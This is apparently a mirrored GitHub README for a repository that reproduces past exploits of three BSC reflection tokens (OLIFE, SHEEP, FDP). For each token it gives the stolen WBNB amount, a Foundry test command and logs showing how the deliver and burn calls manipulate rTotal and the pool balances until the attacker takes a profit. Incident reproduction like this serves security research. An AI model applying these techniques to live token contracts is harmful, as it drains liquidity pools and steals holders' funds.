Giter Site home page Giter Site logo

reflection-token-exploits's Introduction

Reflection Token Exploits

April 19, 2023 - OLIFE on BSC (2021-06-04 16:54:29 deployed, block - 8008368)

Lost: 32 WBNB

forge test --match-path ./test/OLIFE_exploit.sol -vvv

[PASS] testExploit() (gas: 2053405)
Logs:
  [INFO] OLIFE rTotal amount before exploit: 85787064557914687385808389302142529537473958575299666392931825726514846459985
  [INFO] LP Pool rOwned amount before exploit: 52183093109539423970655060745047488352191355196264772690610060507797169984665
  [INFO] OLIFE amount in pair before the currentRate reduction: 5583143.203784247
  [INFO] OLIFE amount in attack contract before deliver: 148760274.602488242
  [INFO] OLIFE rTotal amount before loop transfer: 80232463100068046723341281231776589377142955898086881610546465168539439847121
  [INFO] OLIFE rTotal amount before deliver: 40200448665335087600887604709511439395872309977515044071463339802120403101897
  [INFO] OLIFE rTotal amount after deliver: 35418443622421426762592009661219262096468781030890380294889952695622203861897
  [INFO] LP Pool rOwned amount after deliver: 1686716220024506686367921086370004158487204006800346538117599203788485107609
  [INFO] OLIFE amount in pair after the currentRate reduction: 217839506118721725361.721643770
  [INFO] OLIFE amount in attack contract after deliver: 16499689513508949904.965052673
  [End] Attacker WBNB balance after exploit: 32.286315327663894139

February 10, 2023 - SHEEP on BSC (2021-04-29 4:13:50 deployed, block - 6977249)

Lost: 16 WBNB

forge test --match-path ./test/SHEEP_exploit.sol -vvv

[PASS] testExploit() (gas: 1257901)
Logs:
  [INFO] SHEEP rTotal amount before exploit: 60584254173738479822327251709072292945892110836412010301654537246316242144512
  [INFO] SHEEP amount in pair before burn: 2797524497.609081132
  [INFO] SHEEP amount in attack contract before burn: 25909852936.496774794
  [INFO] SHEEP rTotal amount before burn: 59215460978135173158676612258487448007070402970606630179506034991946198000500
  [INFO] SHEEP rTotal amount after burn: 59215460978135173158676612258487448007070402970606630179506034991946198000500
  [INFO] SHEEP amount in pair after burn: 0.000000001
  [INFO] SHEEP amount in attack contract after burn: 0.000000018
  [End] Attacker WBNB balance after exploit: 16.393908411541380869

February 7, 2023 - FDP on BSC (2021-06-05 15:32:33 deployed, block - 8035469)

Lost: 16 WBNB

forge test --match-path ./test/FDP_exploit.sol -vvv

[PASS] testExploit() (gas: 345731)
Logs:
  [INFO] FDP rTotal amount before exploit: 113325717736561360461048923028002855415995333992262419986800000000000000000000
  [INFO] FDP amount in pair before deliver: 50070.843098193920432940
  [INFO] FDP amount in attack contract before deliver: 49925.109590047580102880
  [INFO] FDP rTotal amount after deliver: 80367630109601272051725235851404002303066533024905681230577600000000000000000
  [INFO] FDP amount in pair after deliver: 11124332.801853764113675419
  [INFO] FDP amount in attack contract after deliver: 4768241.456371843363743920
  [End] Attacker WBNB balance after exploit: 16.176701609462839506

reflection-token-exploits's People

Contributors

azvast avatar

Stargazers

avatar avatar avatar

Watchers

avatar avatar

reflection-token-exploits's Issues

Some math question

In the FDP vulnerability, while rtotal only decreases the overall count by 29%, the final rate decreases by over 200 times.
image

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.